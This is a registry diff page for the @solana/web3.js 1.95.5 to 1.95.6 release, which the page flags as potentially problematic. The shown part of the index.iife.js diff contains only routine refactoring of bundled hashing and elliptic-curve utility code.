@solana/web3.js 1.95.5 → 1.95.6
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of @solana/web3.js might be problematic. Click here for more details.
- package/lib/index.browser.cjs.js +77 -51
- package/lib/index.browser.cjs.js.map +1 -1
- package/lib/index.browser.esm.js +77 -51
- package/lib/index.browser.esm.js.map +1 -1
- package/lib/index.cjs.js +77 -51
- package/lib/index.cjs.js.map +1 -1
- package/lib/index.esm.js +77 -51
- package/lib/index.esm.js.map +1 -1
- package/lib/index.iife.js +346 -221
- package/lib/index.iife.js.map +1 -1
- package/lib/index.iife.min.js +10 -10
- package/lib/index.iife.min.js.map +1 -1
- package/lib/index.native.js +77 -51
- package/lib/index.native.js.map +1 -1
- package/package.json +1 -20
package/lib/index.iife.js
CHANGED
|
@@ -2401,38 +2401,37 @@ var solanaWeb3 = (function (exports) {
|
|
|
2401
2401
|
|
|
2402
2402
|
var bufferExports = /*@__PURE__*/ requireBuffer();
|
|
2403
2403
|
|
|
2404
|
-
function
|
|
2404
|
+
function anumber(n) {
|
|
2405
2405
|
if (!Number.isSafeInteger(n) || n < 0)
|
|
2406
|
-
throw new Error(
|
|
2406
|
+
throw new Error('positive integer expected, got ' + n);
|
|
2407
2407
|
}
|
|
2408
2408
|
// copied from utils
|
|
2409
2409
|
function isBytes$1(a) {
|
|
2410
|
-
return
|
|
2411
|
-
(a != null && typeof a === 'object' && a.constructor.name === 'Uint8Array'));
|
|
2410
|
+
return a instanceof Uint8Array || (ArrayBuffer.isView(a) && a.constructor.name === 'Uint8Array');
|
|
2412
2411
|
}
|
|
2413
|
-
function
|
|
2412
|
+
function abytes$1(b, ...lengths) {
|
|
2414
2413
|
if (!isBytes$1(b))
|
|
2415
2414
|
throw new Error('Uint8Array expected');
|
|
2416
2415
|
if (lengths.length > 0 && !lengths.includes(b.length))
|
|
2417
|
-
throw new Error(
|
|
2416
|
+
throw new Error('Uint8Array expected of length ' + lengths + ', got length=' + b.length);
|
|
2418
2417
|
}
|
|
2419
|
-
function
|
|
2418
|
+
function ahash(h) {
|
|
2420
2419
|
if (typeof h !== 'function' || typeof h.create !== 'function')
|
|
2421
2420
|
throw new Error('Hash should be wrapped by utils.wrapConstructor');
|
|
2422
|
-
|
|
2423
|
-
|
|
2421
|
+
anumber(h.outputLen);
|
|
2422
|
+
anumber(h.blockLen);
|
|
2424
2423
|
}
|
|
2425
|
-
function
|
|
2424
|
+
function aexists(instance, checkFinished = true) {
|
|
2426
2425
|
if (instance.destroyed)
|
|
2427
2426
|
throw new Error('Hash instance has been destroyed');
|
|
2428
2427
|
if (checkFinished && instance.finished)
|
|
2429
2428
|
throw new Error('Hash#digest() has already been called');
|
|
2430
2429
|
}
|
|
2431
|
-
function
|
|
2432
|
-
|
|
2430
|
+
function aoutput(out, instance) {
|
|
2431
|
+
abytes$1(out);
|
|
2433
2432
|
const min = instance.outputLen;
|
|
2434
2433
|
if (out.length < min) {
|
|
2435
|
-
throw new Error(
|
|
2434
|
+
throw new Error('digestInto() expects output buffer of length at least ' + min);
|
|
2436
2435
|
}
|
|
2437
2436
|
}
|
|
2438
2437
|
|
|
@@ -2450,7 +2449,7 @@ var solanaWeb3 = (function (exports) {
|
|
|
2450
2449
|
const createView = (arr) => new DataView(arr.buffer, arr.byteOffset, arr.byteLength);
|
|
2451
2450
|
// The rotate right (circular right shift) operation for uint32
|
|
2452
2451
|
const rotr = (word, shift) => (word << (32 - shift)) | (word >>> shift);
|
|
2453
|
-
const isLE = new Uint8Array(new Uint32Array([0x11223344]).buffer)[0] === 0x44;
|
|
2452
|
+
const isLE = /* @__PURE__ */ (() => new Uint8Array(new Uint32Array([0x11223344]).buffer)[0] === 0x44)();
|
|
2454
2453
|
// The byte swap operation for uint32
|
|
2455
2454
|
const byteSwap = (word) => ((word << 24) & 0xff000000) |
|
|
2456
2455
|
((word << 8) & 0xff0000) |
|
|
@@ -2467,7 +2466,7 @@ var solanaWeb3 = (function (exports) {
|
|
|
2467
2466
|
*/
|
|
2468
2467
|
function utf8ToBytes$1(str) {
|
|
2469
2468
|
if (typeof str !== 'string')
|
|
2470
|
-
throw new Error(
|
|
2469
|
+
throw new Error('utf8ToBytes expected string, got ' + typeof str);
|
|
2471
2470
|
return new Uint8Array(new TextEncoder().encode(str)); // https://bugzil.la/1681809
|
|
2472
2471
|
}
|
|
2473
2472
|
/**
|
|
@@ -2478,7 +2477,7 @@ var solanaWeb3 = (function (exports) {
|
|
|
2478
2477
|
function toBytes(data) {
|
|
2479
2478
|
if (typeof data === 'string')
|
|
2480
2479
|
data = utf8ToBytes$1(data);
|
|
2481
|
-
|
|
2480
|
+
abytes$1(data);
|
|
2482
2481
|
return data;
|
|
2483
2482
|
}
|
|
2484
2483
|
/**
|
|
@@ -2488,7 +2487,7 @@ var solanaWeb3 = (function (exports) {
|
|
|
2488
2487
|
let sum = 0;
|
|
2489
2488
|
for (let i = 0; i < arrays.length; i++) {
|
|
2490
2489
|
const a = arrays[i];
|
|
2491
|
-
|
|
2490
|
+
abytes$1(a);
|
|
2492
2491
|
sum += a.length;
|
|
2493
2492
|
}
|
|
2494
2493
|
const res = new Uint8Array(sum);
|
|
@@ -2570,7 +2569,7 @@ var solanaWeb3 = (function (exports) {
|
|
|
2570
2569
|
this.view = createView(this.buffer);
|
|
2571
2570
|
}
|
|
2572
2571
|
update(data) {
|
|
2573
|
-
|
|
2572
|
+
aexists(this);
|
|
2574
2573
|
const { view, buffer, blockLen } = this;
|
|
2575
2574
|
data = toBytes(data);
|
|
2576
2575
|
const len = data.length;
|
|
@@ -2596,8 +2595,8 @@ var solanaWeb3 = (function (exports) {
|
|
|
2596
2595
|
return this;
|
|
2597
2596
|
}
|
|
2598
2597
|
digestInto(out) {
|
|
2599
|
-
|
|
2600
|
-
|
|
2598
|
+
aexists(this);
|
|
2599
|
+
aoutput(out, this);
|
|
2601
2600
|
this.finished = true;
|
|
2602
2601
|
// Padding
|
|
2603
2602
|
// We can avoid allocation of buffer for padding completely if it
|
|
@@ -2656,7 +2655,8 @@ var solanaWeb3 = (function (exports) {
|
|
|
2656
2655
|
|
|
2657
2656
|
const U32_MASK64 = /* @__PURE__ */ BigInt(2 ** 32 - 1);
|
|
2658
2657
|
const _32n = /* @__PURE__ */ BigInt(32);
|
|
2659
|
-
//
|
|
2658
|
+
// BigUint64Array is too slow as per 2024, so we implement it using Uint32Array.
|
|
2659
|
+
// TODO: re-check https://issues.chromium.org/issues/42212588
|
|
2660
2660
|
function fromBig(n, le = false) {
|
|
2661
2661
|
if (le)
|
|
2662
2662
|
return { h: Number(n & U32_MASK64), l: Number((n >> _32n) & U32_MASK64) };
|
|
@@ -2878,8 +2878,7 @@ var solanaWeb3 = (function (exports) {
|
|
|
2878
2878
|
const _1n$7 = /* @__PURE__ */ BigInt(1);
|
|
2879
2879
|
const _2n$5 = /* @__PURE__ */ BigInt(2);
|
|
2880
2880
|
function isBytes(a) {
|
|
2881
|
-
return
|
|
2882
|
-
(a != null && typeof a === 'object' && a.constructor.name === 'Uint8Array'));
|
|
2881
|
+
return a instanceof Uint8Array || (ArrayBuffer.isView(a) && a.constructor.name === 'Uint8Array');
|
|
2883
2882
|
}
|
|
2884
2883
|
function abytes(item) {
|
|
2885
2884
|
if (!isBytes(item))
|
|
@@ -2887,7 +2886,7 @@ var solanaWeb3 = (function (exports) {
|
|
|
2887
2886
|
}
|
|
2888
2887
|
function abool(title, value) {
|
|
2889
2888
|
if (typeof value !== 'boolean')
|
|
2890
|
-
throw new Error(
|
|
2889
|
+
throw new Error(title + ' boolean expected, got ' + value);
|
|
2891
2890
|
}
|
|
2892
2891
|
// Array where index 0xf0 (240) is mapped to string 'f0'
|
|
2893
2892
|
const hexes = /* @__PURE__ */ Array.from({ length: 256 }, (_, i) => i.toString(16).padStart(2, '0'));
|
|
@@ -2905,23 +2904,22 @@ var solanaWeb3 = (function (exports) {
|
|
|
2905
2904
|
}
|
|
2906
2905
|
function numberToHexUnpadded(num) {
|
|
2907
2906
|
const hex = num.toString(16);
|
|
2908
|
-
return hex.length & 1 ?
|
|
2907
|
+
return hex.length & 1 ? '0' + hex : hex;
|
|
2909
2908
|
}
|
|
2910
2909
|
function hexToNumber(hex) {
|
|
2911
2910
|
if (typeof hex !== 'string')
|
|
2912
2911
|
throw new Error('hex string expected, got ' + typeof hex);
|
|
2913
|
-
// Big Endian
|
|
2914
|
-
return BigInt(hex === '' ? '0' : `0x${hex}`);
|
|
2912
|
+
return hex === '' ? _0n$5 : BigInt('0x' + hex); // Big Endian
|
|
2915
2913
|
}
|
|
2916
2914
|
// We use optimized technique to convert hex string to byte array
|
|
2917
|
-
const asciis = { _0: 48, _9: 57,
|
|
2918
|
-
function asciiToBase16(
|
|
2919
|
-
if (
|
|
2920
|
-
return
|
|
2921
|
-
if (
|
|
2922
|
-
return
|
|
2923
|
-
if (
|
|
2924
|
-
return
|
|
2915
|
+
const asciis = { _0: 48, _9: 57, A: 65, F: 70, a: 97, f: 102 };
|
|
2916
|
+
function asciiToBase16(ch) {
|
|
2917
|
+
if (ch >= asciis._0 && ch <= asciis._9)
|
|
2918
|
+
return ch - asciis._0; // '2' => 50-48
|
|
2919
|
+
if (ch >= asciis.A && ch <= asciis.F)
|
|
2920
|
+
return ch - (asciis.A - 10); // 'B' => 66-(65-10)
|
|
2921
|
+
if (ch >= asciis.a && ch <= asciis.f)
|
|
2922
|
+
return ch - (asciis.a - 10); // 'b' => 98-(97-10)
|
|
2925
2923
|
return;
|
|
2926
2924
|
}
|
|
2927
2925
|
/**
|
|
@@ -2933,7 +2931,7 @@ var solanaWeb3 = (function (exports) {
|
|
|
2933
2931
|
const hl = hex.length;
|
|
2934
2932
|
const al = hl / 2;
|
|
2935
2933
|
if (hl % 2)
|
|
2936
|
-
throw new Error('
|
|
2934
|
+
throw new Error('hex string expected, got unpadded hex of length ' + hl);
|
|
2937
2935
|
const array = new Uint8Array(al);
|
|
2938
2936
|
for (let ai = 0, hi = 0; ai < al; ai++, hi += 2) {
|
|
2939
2937
|
const n1 = asciiToBase16(hex.charCodeAt(hi));
|
|
@@ -2942,7 +2940,7 @@ var solanaWeb3 = (function (exports) {
|
|
|
2942
2940
|
const char = hex[hi] + hex[hi + 1];
|
|
2943
2941
|
throw new Error('hex string expected, got non-hex character "' + char + '" at index ' + hi);
|
|
2944
2942
|
}
|
|
2945
|
-
array[ai] = n1 * 16 + n2;
|
|
2943
|
+
array[ai] = n1 * 16 + n2; // multiply first octet, e.g. 'a3' => 10*16+3 => 160 + 3 => 163
|
|
2946
2944
|
}
|
|
2947
2945
|
return array;
|
|
2948
2946
|
}
|
|
@@ -2980,7 +2978,7 @@ var solanaWeb3 = (function (exports) {
|
|
|
2980
2978
|
res = hexToBytes(hex);
|
|
2981
2979
|
}
|
|
2982
2980
|
catch (e) {
|
|
2983
|
-
throw new Error(
|
|
2981
|
+
throw new Error(title + ' must be hex string or Uint8Array, cause: ' + e);
|
|
2984
2982
|
}
|
|
2985
2983
|
}
|
|
2986
2984
|
else if (isBytes(hex)) {
|
|
@@ -2989,11 +2987,11 @@ var solanaWeb3 = (function (exports) {
|
|
|
2989
2987
|
res = Uint8Array.from(hex);
|
|
2990
2988
|
}
|
|
2991
2989
|
else {
|
|
2992
|
-
throw new Error(
|
|
2990
|
+
throw new Error(title + ' must be hex string or Uint8Array');
|
|
2993
2991
|
}
|
|
2994
2992
|
const len = res.length;
|
|
2995
2993
|
if (typeof expectedLength === 'number' && len !== expectedLength)
|
|
2996
|
-
throw new Error(
|
|
2994
|
+
throw new Error(title + ' of length ' + expectedLength + ' expected, got ' + len);
|
|
2997
2995
|
return res;
|
|
2998
2996
|
}
|
|
2999
2997
|
/**
|
|
@@ -3028,7 +3026,7 @@ var solanaWeb3 = (function (exports) {
|
|
|
3028
3026
|
*/
|
|
3029
3027
|
function utf8ToBytes(str) {
|
|
3030
3028
|
if (typeof str !== 'string')
|
|
3031
|
-
throw new Error(
|
|
3029
|
+
throw new Error('string expected');
|
|
3032
3030
|
return new Uint8Array(new TextEncoder().encode(str)); // https://bugzil.la/1681809
|
|
3033
3031
|
}
|
|
3034
3032
|
// Is positive bigint
|
|
@@ -3048,7 +3046,7 @@ var solanaWeb3 = (function (exports) {
|
|
|
3048
3046
|
// - b would commonly require subtraction: `inRange('x', x, 0n, P - 1n)`
|
|
3049
3047
|
// - our way is the cleanest: `inRange('x', x, 0n, P)
|
|
3050
3048
|
if (!inRange(n, min, max))
|
|
3051
|
-
throw new Error(
|
|
3049
|
+
throw new Error('expected valid ' + title + ': ' + min + ' <= n < ' + max + ', got ' + n);
|
|
3052
3050
|
}
|
|
3053
3051
|
// Bit operations
|
|
3054
3052
|
/**
|
|
@@ -3158,12 +3156,12 @@ var solanaWeb3 = (function (exports) {
|
|
|
3158
3156
|
const checkField = (fieldName, type, isOptional) => {
|
|
3159
3157
|
const checkVal = validatorFns[type];
|
|
3160
3158
|
if (typeof checkVal !== 'function')
|
|
3161
|
-
throw new Error(
|
|
3159
|
+
throw new Error('invalid validator function');
|
|
3162
3160
|
const val = object[fieldName];
|
|
3163
3161
|
if (isOptional && val === undefined)
|
|
3164
3162
|
return;
|
|
3165
3163
|
if (!checkVal(val, object)) {
|
|
3166
|
-
throw new Error(
|
|
3164
|
+
throw new Error('param ' + String(fieldName) + ' is invalid. Expected ' + type + ', got ' + val);
|
|
3167
3165
|
}
|
|
3168
3166
|
};
|
|
3169
3167
|
for (const [fieldName, type] of Object.entries(validators))
|
|
@@ -3235,11 +3233,9 @@ var solanaWeb3 = (function (exports) {
|
|
|
3235
3233
|
/*! noble-curves - MIT License (c) 2022 Paul Miller (paulmillr.com) */
|
|
3236
3234
|
// Utilities for modular arithmetics and finite fields
|
|
3237
3235
|
// prettier-ignore
|
|
3238
|
-
const _0n$4 = BigInt(0), _1n$6 = BigInt(1), _2n$4 = BigInt(2), _3n$1 = BigInt(3);
|
|
3236
|
+
const _0n$4 = BigInt(0), _1n$6 = BigInt(1), _2n$4 = /* @__PURE__ */ BigInt(2), _3n$1 = /* @__PURE__ */ BigInt(3);
|
|
3239
3237
|
// prettier-ignore
|
|
3240
|
-
const _4n = BigInt(4), _5n$1 = BigInt(5), _8n$2 = BigInt(8);
|
|
3241
|
-
// prettier-ignore
|
|
3242
|
-
BigInt(9); BigInt(16);
|
|
3238
|
+
const _4n = /* @__PURE__ */ BigInt(4), _5n$1 = /* @__PURE__ */ BigInt(5), _8n$2 = /* @__PURE__ */ BigInt(8);
|
|
3243
3239
|
// Calculates a modulo b
|
|
3244
3240
|
function mod(a, b) {
|
|
3245
3241
|
const result = a % b;
|
|
@@ -3253,8 +3249,10 @@ var solanaWeb3 = (function (exports) {
|
|
|
3253
3249
|
*/
|
|
3254
3250
|
// TODO: use field version && remove
|
|
3255
3251
|
function pow(num, power, modulo) {
|
|
3256
|
-
if (
|
|
3257
|
-
throw new Error('
|
|
3252
|
+
if (power < _0n$4)
|
|
3253
|
+
throw new Error('invalid exponent, negatives unsupported');
|
|
3254
|
+
if (modulo <= _0n$4)
|
|
3255
|
+
throw new Error('invalid modulus');
|
|
3258
3256
|
if (modulo === _1n$6)
|
|
3259
3257
|
return _0n$4;
|
|
3260
3258
|
let res = _1n$6;
|
|
@@ -3277,9 +3275,10 @@ var solanaWeb3 = (function (exports) {
|
|
|
3277
3275
|
}
|
|
3278
3276
|
// Inverses number over modulo
|
|
3279
3277
|
function invert(number, modulo) {
|
|
3280
|
-
if (number === _0n$4
|
|
3281
|
-
throw new Error(
|
|
3282
|
-
|
|
3278
|
+
if (number === _0n$4)
|
|
3279
|
+
throw new Error('invert: expected non-zero number');
|
|
3280
|
+
if (modulo <= _0n$4)
|
|
3281
|
+
throw new Error('invert: expected positive modulus, got ' + modulo);
|
|
3283
3282
|
// Euclidean GCD https://brilliant.org/wiki/extended-euclidean-algorithm/
|
|
3284
3283
|
// Fermat's little theorem "CT-like" version inv(n) = n^(m-2) mod m is 30x slower.
|
|
3285
3284
|
let a = mod(number, modulo);
|
|
@@ -3320,8 +3319,11 @@ var solanaWeb3 = (function (exports) {
|
|
|
3320
3319
|
for (Q = P - _1n$6, S = 0; Q % _2n$4 === _0n$4; Q /= _2n$4, S++)
|
|
3321
3320
|
;
|
|
3322
3321
|
// Step 2: Select a non-square z such that (z | p) ≡ -1 and set c ≡ zq
|
|
3323
|
-
for (Z = _2n$4; Z < P && pow(Z, legendreC, P) !== P - _1n$6; Z++)
|
|
3324
|
-
|
|
3322
|
+
for (Z = _2n$4; Z < P && pow(Z, legendreC, P) !== P - _1n$6; Z++) {
|
|
3323
|
+
// Crash instead of infinity loop, we cannot reasonable count until P.
|
|
3324
|
+
if (Z > 1000)
|
|
3325
|
+
throw new Error('Cannot find square root: likely non-prime P');
|
|
3326
|
+
}
|
|
3325
3327
|
// Fast-path
|
|
3326
3328
|
if (S === 1) {
|
|
3327
3329
|
const p1div4 = (P + _1n$6) / _4n;
|
|
@@ -3429,7 +3431,7 @@ var solanaWeb3 = (function (exports) {
|
|
|
3429
3431
|
// Should have same speed as pow for bigints
|
|
3430
3432
|
// TODO: benchmark!
|
|
3431
3433
|
if (power < _0n$4)
|
|
3432
|
-
throw new Error('
|
|
3434
|
+
throw new Error('invalid exponent, negatives unsupported');
|
|
3433
3435
|
if (power === _0n$4)
|
|
3434
3436
|
return f.ONE;
|
|
3435
3437
|
if (power === _1n$6)
|
|
@@ -3492,11 +3494,11 @@ var solanaWeb3 = (function (exports) {
|
|
|
3492
3494
|
*/
|
|
3493
3495
|
function Field(ORDER, bitLen, isLE = false, redef = {}) {
|
|
3494
3496
|
if (ORDER <= _0n$4)
|
|
3495
|
-
throw new Error(
|
|
3497
|
+
throw new Error('invalid field: expected ORDER > 0, got ' + ORDER);
|
|
3496
3498
|
const { nBitLength: BITS, nByteLength: BYTES } = nLength(ORDER, bitLen);
|
|
3497
3499
|
if (BYTES > 2048)
|
|
3498
|
-
throw new Error('
|
|
3499
|
-
|
|
3500
|
+
throw new Error('invalid field: expected ORDER of <= 2048 bytes');
|
|
3501
|
+
let sqrtP; // cached sqrtP
|
|
3500
3502
|
const f = Object.freeze({
|
|
3501
3503
|
ORDER,
|
|
3502
3504
|
BITS,
|
|
@@ -3507,7 +3509,7 @@ var solanaWeb3 = (function (exports) {
|
|
|
3507
3509
|
create: (num) => mod(num, ORDER),
|
|
3508
3510
|
isValid: (num) => {
|
|
3509
3511
|
if (typeof num !== 'bigint')
|
|
3510
|
-
throw new Error(
|
|
3512
|
+
throw new Error('invalid field element: expected bigint, got ' + typeof num);
|
|
3511
3513
|
return _0n$4 <= num && num < ORDER; // 0 is valid element, but it's not invertible
|
|
3512
3514
|
},
|
|
3513
3515
|
is0: (num) => num === _0n$4,
|
|
@@ -3526,7 +3528,12 @@ var solanaWeb3 = (function (exports) {
|
|
|
3526
3528
|
subN: (lhs, rhs) => lhs - rhs,
|
|
3527
3529
|
mulN: (lhs, rhs) => lhs * rhs,
|
|
3528
3530
|
inv: (num) => invert(num, ORDER),
|
|
3529
|
-
sqrt: redef.sqrt ||
|
|
3531
|
+
sqrt: redef.sqrt ||
|
|
3532
|
+
((n) => {
|
|
3533
|
+
if (!sqrtP)
|
|
3534
|
+
sqrtP = FpSqrt(ORDER);
|
|
3535
|
+
return sqrtP(f, n);
|
|
3536
|
+
}),
|
|
3530
3537
|
invertBatch: (lst) => FpInvertBatch(f, lst),
|
|
3531
3538
|
// TODO: do we really need constant cmov?
|
|
3532
3539
|
// We don't have const-time bigints anyway, so probably will be not very useful
|
|
@@ -3534,7 +3541,7 @@ var solanaWeb3 = (function (exports) {
|
|
|
3534
3541
|
toBytes: (num) => (isLE ? numberToBytesLE(num, BYTES) : numberToBytesBE(num, BYTES)),
|
|
3535
3542
|
fromBytes: (bytes) => {
|
|
3536
3543
|
if (bytes.length !== BYTES)
|
|
3537
|
-
throw new Error(
|
|
3544
|
+
throw new Error('Field.fromBytes: expected ' + BYTES + ' bytes, got ' + bytes.length);
|
|
3538
3545
|
return isLE ? bytesToNumberLE(bytes) : bytesToNumberBE(bytes);
|
|
3539
3546
|
},
|
|
3540
3547
|
});
|
|
@@ -3582,7 +3589,7 @@ var solanaWeb3 = (function (exports) {
|
|
|
3582
3589
|
const minLen = getMinHashLength(fieldOrder);
|
|
3583
3590
|
// No small numbers: need to understand bias story. No huge numbers: easier to detect JS timings.
|
|
3584
3591
|
if (len < 16 || len < minLen || len > 1024)
|
|
3585
|
-
throw new Error(
|
|
3592
|
+
throw new Error('expected ' + minLen + '-1024 bytes of input, got ' + len);
|
|
3586
3593
|
const num = isLE ? bytesToNumberBE(key) : bytesToNumberLE(key);
|
|
3587
3594
|
// `mod(x, 11)` can sometimes produce 0. `mod(x, 10) + 1` is the same, but no 0
|
|
3588
3595
|
const reduced = mod(num, fieldOrder - _1n$6) + _1n$6;
|
|
@@ -3593,10 +3600,43 @@ var solanaWeb3 = (function (exports) {
|
|
|
3593
3600
|
// Abelian group utilities
|
|
3594
3601
|
const _0n$3 = BigInt(0);
|
|
3595
3602
|
const _1n$5 = BigInt(1);
|
|
3603
|
+
function constTimeNegate(condition, item) {
|
|
3604
|
+
const neg = item.negate();
|
|
3605
|
+
return condition ? neg : item;
|
|
3606
|
+
}
|
|
3607
|
+
function validateW(W, bits) {
|
|
3608
|
+
if (!Number.isSafeInteger(W) || W <= 0 || W > bits)
|
|
3609
|
+
throw new Error('invalid window size, expected [1..' + bits + '], got W=' + W);
|
|
3610
|
+
}
|
|
3611
|
+
function calcWOpts(W, bits) {
|
|
3612
|
+
validateW(W, bits);
|
|
3613
|
+
const windows = Math.ceil(bits / W) + 1; // +1, because
|
|
3614
|
+
const windowSize = 2 ** (W - 1); // -1 because we skip zero
|
|
3615
|
+
return { windows, windowSize };
|
|
3616
|
+
}
|
|
3617
|
+
function validateMSMPoints(points, c) {
|
|
3618
|
+
if (!Array.isArray(points))
|
|
3619
|
+
throw new Error('array expected');
|
|
3620
|
+
points.forEach((p, i) => {
|
|
3621
|
+
if (!(p instanceof c))
|
|
3622
|
+
throw new Error('invalid point at index ' + i);
|
|
3623
|
+
});
|
|
3624
|
+
}
|
|
3625
|
+
function validateMSMScalars(scalars, field) {
|
|
3626
|
+
if (!Array.isArray(scalars))
|
|
3627
|
+
throw new Error('array of scalars expected');
|
|
3628
|
+
scalars.forEach((s, i) => {
|
|
3629
|
+
if (!field.isValid(s))
|
|
3630
|
+
throw new Error('invalid scalar at index ' + i);
|
|
3631
|
+
});
|
|
3632
|
+
}
|
|
3596
3633
|
// Since points in different groups cannot be equal (different object constructor),
|
|
3597
3634
|
// we can have single place to store precomputes
|
|
3598
3635
|
const pointPrecomputes = new WeakMap();
|
|
3599
3636
|
const pointWindowSizes = new WeakMap(); // This allows use make points immutable (nothing changes inside)
|
|
3637
|
+
function getW(P) {
|
|
3638
|
+
return pointWindowSizes.get(P) || 1;
|
|
3639
|
+
}
|
|
3600
3640
|
// Elliptic curve multiplication of Point by scalar. Fragile.
|
|
3601
3641
|
// Scalars should always be less than curve order: this should be checked inside of a curve itself.
|
|
3602
3642
|
// Creates precomputation tables for fast multiplication:
|
|
@@ -3609,25 +3649,13 @@ var solanaWeb3 = (function (exports) {
|
|
|
3609
3649
|
// TODO: Research returning 2d JS array of windows, instead of a single window. This would allow
|
|
3610
3650
|
// windows to be in different memory locations
|
|
3611
3651
|
function wNAF(c, bits) {
|
|
3612
|
-
const constTimeNegate = (condition, item) => {
|
|
3613
|
-
const neg = item.negate();
|
|
3614
|
-
return condition ? neg : item;
|
|
3615
|
-
};
|
|
3616
|
-
const validateW = (W) => {
|
|
3617
|
-
if (!Number.isSafeInteger(W) || W <= 0 || W > bits)
|
|
3618
|
-
throw new Error(`Wrong window size=${W}, should be [1..${bits}]`);
|
|
3619
|
-
};
|
|
3620
|
-
const opts = (W) => {
|
|
3621
|
-
validateW(W);
|
|
3622
|
-
const windows = Math.ceil(bits / W) + 1; // +1, because
|
|
3623
|
-
const windowSize = 2 ** (W - 1); // -1 because we skip zero
|
|
3624
|
-
return { windows, windowSize };
|
|
3625
|
-
};
|
|
3626
3652
|
return {
|
|
3627
3653
|
constTimeNegate,
|
|
3654
|
+
hasPrecomputes(elm) {
|
|
3655
|
+
return getW(elm) !== 1;
|
|
3656
|
+
},
|
|
3628
3657
|
// non-const time multiplication ladder
|
|
3629
|
-
unsafeLadder(elm, n) {
|
|
3630
|
-
let p = c.ZERO;
|
|
3658
|
+
unsafeLadder(elm, n, p = c.ZERO) {
|
|
3631
3659
|
let d = elm;
|
|
3632
3660
|
while (n > _0n$3) {
|
|
3633
3661
|
if (n & _1n$5)
|
|
@@ -3645,10 +3673,12 @@ var solanaWeb3 = (function (exports) {
|
|
|
3645
3673
|
* - 𝑊 is the window size
|
|
3646
3674
|
* - 𝑛 is the bitlength of the curve order.
|
|
3647
3675
|
* For a 256-bit curve and window size 8, the number of precomputed points is 128 * 33 = 4224.
|
|
3676
|
+
* @param elm Point instance
|
|
3677
|
+
* @param W window size
|
|
3648
3678
|
* @returns precomputed point tables flattened to a single array
|
|
3649
3679
|
*/
|
|
3650
3680
|
precomputeWindow(elm, W) {
|
|
3651
|
-
const { windows, windowSize } =
|
|
3681
|
+
const { windows, windowSize } = calcWOpts(W, bits);
|
|
3652
3682
|
const points = [];
|
|
3653
3683
|
let p = elm;
|
|
3654
3684
|
let base = p;
|
|
@@ -3674,7 +3704,7 @@ var solanaWeb3 = (function (exports) {
|
|
|
3674
3704
|
wNAF(W, precomputes, n) {
|
|
3675
3705
|
// TODO: maybe check that scalar is less than group order? wNAF behavious is undefined otherwise
|
|
3676
3706
|
// But need to carefully remove other checks before wNAF. ORDER == bits here
|
|
3677
|
-
const { windows, windowSize } =
|
|
3707
|
+
const { windows, windowSize } = calcWOpts(W, bits);
|
|
3678
3708
|
let p = c.ZERO;
|
|
3679
3709
|
let f = c.BASE;
|
|
3680
3710
|
const mask = BigInt(2 ** W - 1); // Create mask with W ones: 0b1111 for W=4 etc.
|
|
@@ -3718,8 +3748,44 @@ var solanaWeb3 = (function (exports) {
|
|
|
3718
3748
|
// which makes it less const-time: around 1 bigint multiply.
|
|
3719
3749
|
return { p, f };
|
|
3720
3750
|
},
|
|
3721
|
-
|
|
3722
|
-
|
|
3751
|
+
/**
|
|
3752
|
+
* Implements ec unsafe (non const-time) multiplication using precomputed tables and w-ary non-adjacent form.
|
|
3753
|
+
* @param W window size
|
|
3754
|
+
* @param precomputes precomputed tables
|
|
3755
|
+
* @param n scalar (we don't check here, but should be less than curve order)
|
|
3756
|
+
* @param acc accumulator point to add result of multiplication
|
|
3757
|
+
* @returns point
|
|
3758
|
+
*/
|
|
3759
|
+
wNAFUnsafe(W, precomputes, n, acc = c.ZERO) {
|
|
3760
|
+
const { windows, windowSize } = calcWOpts(W, bits);
|
|
3761
|
+
const mask = BigInt(2 ** W - 1); // Create mask with W ones: 0b1111 for W=4 etc.
|
|
3762
|
+
const maxNumber = 2 ** W;
|
|
3763
|
+
const shiftBy = BigInt(W);
|
|
3764
|
+
for (let window = 0; window < windows; window++) {
|
|
3765
|
+
const offset = window * windowSize;
|
|
3766
|
+
if (n === _0n$3)
|
|
3767
|
+
break; // No need to go over empty scalar
|
|
3768
|
+
// Extract W bits.
|
|
3769
|
+
let wbits = Number(n & mask);
|
|
3770
|
+
// Shift number by W bits.
|
|
3771
|
+
n >>= shiftBy;
|
|
3772
|
+
// If the bits are bigger than max size, we'll split those.
|
|
3773
|
+
// +224 => 256 - 32
|
|
3774
|
+
if (wbits > windowSize) {
|
|
3775
|
+
wbits -= maxNumber;
|
|
3776
|
+
n += _1n$5;
|
|
3777
|
+
}
|
|
3778
|
+
if (wbits === 0)
|
|
3779
|
+
continue;
|
|
3780
|
+
let curr = precomputes[offset + Math.abs(wbits) - 1]; // -1 because we skip zero
|
|
3781
|
+
if (wbits < 0)
|
|
3782
|
+
curr = curr.negate();
|
|
3783
|
+
// NOTE: by re-using acc, we can save a lot of additions in case of MSM
|
|
3784
|
+
acc = acc.add(curr);
|
|
3785
|
+
}
|
|
3786
|
+
return acc;
|
|
3787
|
+
},
|
|
3788
|
+
getPrecomputes(W, P, transform) {
|
|
3723
3789
|
// Calculate precomputes on a first run, reuse them after
|
|
3724
3790
|
let comp = pointPrecomputes.get(P);
|
|
3725
3791
|
if (!comp) {
|
|
@@ -3727,62 +3793,66 @@ var solanaWeb3 = (function (exports) {
|
|
|
3727
3793
|
if (W !== 1)
|
|
3728
3794
|
pointPrecomputes.set(P, transform(comp));
|
|
3729
3795
|
}
|
|
3730
|
-
return
|
|
3796
|
+
return comp;
|
|
3797
|
+
},
|
|
3798
|
+
wNAFCached(P, n, transform) {
|
|
3799
|
+
const W = getW(P);
|
|
3800
|
+
return this.wNAF(W, this.getPrecomputes(W, P, transform), n);
|
|
3801
|
+
},
|
|
3802
|
+
wNAFCachedUnsafe(P, n, transform, prev) {
|
|
3803
|
+
const W = getW(P);
|
|
3804
|
+
if (W === 1)
|
|
3805
|
+
return this.unsafeLadder(P, n, prev); // For W=1 ladder is ~x2 faster
|
|
3806
|
+
return this.wNAFUnsafe(W, this.getPrecomputes(W, P, transform), n, prev);
|
|
3731
3807
|
},
|
|
3732
3808
|
// We calculate precomputes for elliptic curve point multiplication
|
|
3733
3809
|
// using windowed method. This specifies window size and
|
|
3734
3810
|
// stores precomputed values. Usually only base point would be precomputed.
|
|
3735
3811
|
setWindowSize(P, W) {
|
|
3736
|
-
validateW(W);
|
|
3812
|
+
validateW(W, bits);
|
|
3737
3813
|
pointWindowSizes.set(P, W);
|
|
3738
